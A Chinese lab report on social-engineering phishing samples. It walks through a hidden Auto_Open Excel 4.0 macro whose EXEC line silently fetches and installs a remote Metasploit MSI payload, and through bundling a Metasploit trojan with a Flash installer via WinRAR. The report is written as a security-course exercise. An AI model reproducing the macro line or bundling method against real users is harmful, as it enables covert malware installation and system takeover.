社会工程学

一、实验目的

学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。

二、实验任务

1、制作恶意的excel文件

2、将正常的软件和恶意木马进行捆绑打包

三、实验环境

1、靶机地址:192.168.137.132

2、攻击机地址:192.168.137.128

四、实验过程和实验结果

(一)excel宏

1.msf生成恶意的msi文件

  1. msf建立监听

  1. python在具有恶意的msi的文件夹下开启http服务

  1. 开始制作excel

改一个更加容易让受害者相信的文件名,并加一些内容蒙混

  1. 插入宏

选择插入宏表

第一行输入

=EXEC("msiexec /q /i http://192.168.32.128/diaoyu.msi")

表示调用服务器上的msi

第二行输入

=HALT()

标识Excel 4.0宏结束

在A1 左上角改成Auto_Open让exl打开时候自动运行宏,然后回车

然后隐藏宏,并另存为启用宏的工作表

保存后拖到windows7的虚拟机,运行然后启用宏

成功上线

  • 常规软件捆绑远控木马进行钓鱼

制作msf木马

将制作的木马程序和flash安装包用winrar压缩在一起,并设置解压后运行这两个文件

打开监听

将压缩文件拖到win7中

点击安装,成功上线

五、实验总结

通过本次实验,我学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。

实验过程中遇到的问题:恶意excel文件多次尝试不能上线,通过多次重新制作excel文件、仔细核对文件左上角的木马并多次尝试解决;正常文件和恶意木马打包时要使用特定的压缩工具打包。

在日常工作、生活中要警惕社会工程的渗透,提高信息安全意识。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值